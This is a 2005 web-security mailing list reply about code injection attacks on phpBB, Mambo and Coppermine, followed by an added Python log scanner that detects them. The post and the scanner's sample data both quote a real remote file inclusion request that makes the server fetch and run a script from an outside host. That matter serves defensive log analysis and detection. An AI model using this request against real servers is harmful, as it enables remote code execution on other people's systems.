WebApp Sec mailing list archives

Re: Mambo, Coppermine and PHPBB Attacks


From: Paul Laudanski <zx () castlecops com>
Date: Mon, 19 Dec 2005 18:24:14 -0500 (EST)

On Mon, 19 Dec 2005, Mark Ryan del Moral Talabis wrote:

> Our honeynet has been picking up an increase in the number of code
> injection attacks in the past few days. Attacks are primarily directed
> to several popular open source applications: Mambo, Coppermine and
> PHPBB.
>
> Analysis:
> http://www.philippinehoneynet.org/dataarchive.php?date=2005-12-17

Nice catch.  I checked my logs and found this, which appears to be the
valid phpbb injection request:

81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"

Notice the admin_styles.php is written out once.  I would suspect that
disabling the allow_url_fopen directive in php.ini would not allow such a
request to execute.  This would prevent resources other than files from
being included.  But I haven't tested.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
[cal] http://events.castlecops.com
[de] http://de.castlecops.com
[en] http://castlecops.com
[wiki] http://wiki.castlecops.com
[family] http://cuddlesnkisses.com
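
As an added example (not from the original post, nor code from phpBB, Mambo or Coppermine): a small Python scanner that reads NCSA-style access-log lines like the one quoted above and flags any query parameter whose value is a remote URL, which is the signature of this kind of injection request. The log format and the two benign sample entries are assumed; the first sample entry is the request quoted in the post.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# NCSA/Apache log prefix: host ident user [time] "method target protocol".
# Status, bytes and referer are left optional so the line quoted in the post parses too.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)"'
)

# URL schemes PHP will fetch over the network from include/require when
# allow_url_fopen (and, on PHP 5.2+, allow_url_include) is enabled.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def remote_params(target):
    """Return [(name, value)] for query parameters whose value is a remote URL."""
    # urlsplit cuts the query at the first '?', so the trailing '?' the phpbb
    # request appends to the injected URL stays inside the parameter value.
    query = urlsplit(target).query
    return [
        (name, value)
        for name, value in parse_qsl(query, keep_blank_values=True)
        if value.lower().startswith(REMOTE_SCHEMES)
    ]

def scan_log(lines):
    """Return (host, path, [(param, url), ...]) for each request carrying a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        target = m.group("target")
        params = remote_params(target)
        if params:
            hits.append((m.group("host"), urlsplit(target).path, params))
    return hits

# Constructed sample: the request quoted in the post plus two benign entries.
SAMPLE_LOG = [
    '81.215.110.24 - - [19/Dec/2005:07:20:30 -0500] "GET /modules/Forums/admin/'
    'admin_styles.php?phpbb_root_path=http://www.frauenfinanzzentrum.at/tool25.dat?&cmd=id HTTP/1.0"',
    '10.0.0.5 - - [19/Dec/2005:07:21:02 -0500] "GET /modules/Forums/viewtopic.php?t=42 HTTP/1.1" 200 5120',
    '10.0.0.6 - - [19/Dec/2005:07:21:10 -0500] "GET /index.php?redirect=%2Fhome HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for host, path, params in scan_log(SAMPLE_LOG):
        print(host, path, ", ".join(f"{n}={v}" for n, v in params))
```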
